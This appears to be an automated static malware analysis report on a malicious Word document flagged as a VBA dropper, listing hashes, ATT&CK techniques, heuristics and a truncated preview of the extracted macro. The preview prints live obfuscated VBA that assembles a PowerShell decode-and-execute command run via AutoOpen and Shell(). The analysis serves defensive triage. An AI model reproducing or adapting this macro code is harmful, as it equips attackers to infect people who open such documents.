Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 36c48656d3e758b7…

MALICIOUS

Office (OLE)

119.0 KB Created: 2018-05-23 09:55:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 9d160deb9c4147cf99c29a13e283573e SHA-1: 6935324f84ddfcf5c822920114da0727fc17ddbe SHA-256: 36c48656d3e758b7c92e32b1be0c0afc8c8a23a92fbe331ac31c19b8d22ac319
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro and Shell() call indicate that the VBA code is designed to execute automatically. The script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6575979-0' further supports its role as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6575979-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6575979-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 122983 bytes
SHA-256: 44f9baa3d87c523597a84d544fe6e4632d7c0a836591e84bcb551d730cec155d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "tcAASwAJtUZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function Gjiqt()

On Error Resume Next
EsdZdza = GrAjE + CSng(374598) + 584987 / Sin(928121 - CByte(715123) / 823428 - Round(374598)) + twWdWF * jHaucfK - (584987 + 928121 + 715123 - 3745980)
Set UulQbNi = wpfVjkKw
JRtOnowz = "xVhgZ0UQKq4BkacqGbI5lDbowershell & ( $pF2qcPTCtuZVomTgCjshfvygHQQe[4]ZCm"
QEvpwKblmG = Left(Right(JRtOnowz, 49), 16) + CStr(Left(Right(JRtOnowz, 16), 2)) + Left(Right(JRtOnowz, 22), 2) + CStr(Left(Right(JRtOnowz, 7), 4))

kCYiwIljz = Chr(43)
jdAZVRsDJ = "aM4SgO6]Q6J9sYKRvK$PshoME[3D0mCBz"
QftSCVjccs = Left(Right(jdAZVRsDJ, 15), 8) + CStr(Left(Right(jdAZVRsDJ, 7), 1)) + CStr(Left(Right(jdAZVRsDJ, 5), 1)) + CStr(Left(Right(jdAZVRsDJ, 26), 1))

vTLRLLiKrUd = Chr(43)
jrNfPEoLf = "4SgO6JQ6J9sYKRvKXnKCHsMPrDwmCBzhIQeEgbZpgX9JnHzRJPMmtO4'x') (nEw-ObJecT sySTem.Io.TmconuLTBUfgS2d19"
JHDWY = Left(Right(jrNfPEoLf, 44), 23) + CStr(Left(Right(jrNfPEoLf, 21), 4)) + CStr(Left(Right(jrNfPEoLf, 15), 2)) + CStr(Left(Right(jrNfPEoLf, 77), 3)) + CStr(Left(Right(jrNfPEoLf, 64), 1))

hBpHu = "4SgO6JQ6J9sYKRvKXnKCHso.MDwmCBzhIQeegbZpgX9JnHzRJPMmtO4sSion.DeFlaTEStREAM([SysTEmTm.inuLTBUfgS2d19"
NbDkt = Left(Right(hBpHu, 44), 23) + CStr(Left(Right(hBpHu, 21), 4)) + CStr(Left(Right(hBpHu, 15), 2)) + CStr(Left(Right(hBpHu, 77), 3)) + CStr(Left(Right(hBpHu, 64), 1))

wjJChZZNB = "4SgO6JQ6J9sYKRvonnKCHsjUVDwmCBzhIQeugbmorystreAm][sYSt4Em.wCMdu79BFtn"
ZBWwp = CStr(Left(Right(wjJChZZNB, 31), 16)) + Left(Right(wjJChZZNB, 14), 3) + CStr(Left(Right(wjJChZZNB, 10), 1)) + CStr(Left(Right(wjJChZZNB, 54), 2)) + CStr(Left(Right(wjJChZZNB, 45), 1))
wKbPRqLZKsJ = mVwKUrWSUJ + CSng(265241) + 741278 / Sin(790410 - CByte(674125) / 260587 - Round(265241)) + PQYhiV * wRLzqi - (741278 + 790410 + 674125 - 2652410)
Set uwvdJCTaH = AINSiNs
VYKuvdafi = "4SgO6JQ6J9sYKRvKXnKCHsjUs5EmCBzhIQeugbP5gX9JnHzRJPMmtO4BjCwsert]::FRombaSE64sTRInG( 'DXVZtBTxgS2d19b15dIlQXO"
LOZUPwr = Left(Right(VYKuvdafi, 48), 25) + Left(Right(VYKuvdafi, 22), 4) + CStr(Left(Right(VYKuvdafi, 17), 2)) + CStr(Left(Right(VYKuvdafi, 84), 3)) + Left(Right(VYKuvdafi, 70), 2)

TCoksiwPw = Chr(43)
mvziww = "aM4SgO6Js6J9sYKRvKXnK0v2HVXW67CIpkIQeug"
mIwXU = CStr(Left(Right(mvziww, 18), 9)) + CStr(Left(Right(mvziww, 8), 2)) + Left(Right(mvziww, 6), 1) + CStr(Left(Right(mvziww, 31), 1))

hPSoXWFQmR = Chr(43)
WVUKGV = "aM4SgO6JQLJ9sYKRvKXnKCH8vRZVKAychUdQpugbZp"
uiuSa = CStr(Left(Right(WVUKGV, 19), 10)) + Left(Right(WVUKGV, 9), 2) + Left(Right(WVUKGV, 6), 1) + Left(Right(WVUKGV, 33), 1)

SDvfa = Chr(43)
oGCCvi = "4SgO6JQ6J9sYKRvKXnmeHsjUSDwmC3zhIQeugbZpgX9JnoYQH8LiQGjYpMlSGnL57/ctn8twEVVjjPgBE"
bbJfD = Left(Right(oGCCvi, 36), 19) + CStr(Left(Right(oGCCvi, 17), 3)) + CStr(Left(Right(oGCCvi, 12), 2)) + Left(Right(oGCCvi, 63), 2) + Left(Right(oGCCvi, 52), 1)

qnGMhO = "aM4SgO6JQ6H9sYKRvKXnKCHsjAmXxeGyP7ZlnngrZpgX9"
nYntmm = CStr(Left(Right(qnGMhO, 20), 11)) + CStr(Left(Right(qnGMhO, 9), 2)) + Left(Right(qnGMhO, 6), 1) + Left(Right(qnGMhO, 35), 1)

OWXHkq = "4SgO6JQ6J9sYKRvKXnKCHsGNqDwmCBzhIQeogbZpgX9JnHzRJPMmtO4juu6rXZzsd1mAb78LIzTxfhdBTvTme7nuLTBUfgS2d19"
dCJzw = Left(Right(OWXHkq, 44), 23) + CStr(Left(Right(OWXHkq, 21), 4)) + CStr(Left(Right(OWXHkq, 15), 2)) + CStr(Left(Right(OWXHkq, 77), 3)) + CStr(Left(Right(OWXHkq, 64), 1))

RdKzEz = "JtE2Oa"
zbdCkBkL = CStr(Left(Right(RdKzEz, 3), 2))
zCJGwIc = zZYdSwlvT + CSng(485823) + 136879 / Sin(139801 - CByte(178420) / 844195 - Round(485823)) + ffqlqvG * RwjMBstSOzU - (136879 + 139801 + 178420 - 4858230)
Set aziiun = MjHNzzjMcb
XjvvuAz = Chr(43)
zPrcWhOH = "JtEjuSElM"
iGwAiPSU = Left(Right(zPrcWhOH, 4), 3)

QpwIiUIlTij = Chr(43)
sIsXhHiKv = "aM4SgO61Q6J9sYKRvK430GMcszCDDmCBz"
OiwoIdXSMf = Left(Right(sIsXhHiKv, 15), 8) + CStr(Left(Right(sIsXhHiKv, 7), 1)) + CStr(Left(Right(sIsXhHiKv, 5), 1)) + CStr(Left(Right(sIsXhHiKv,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.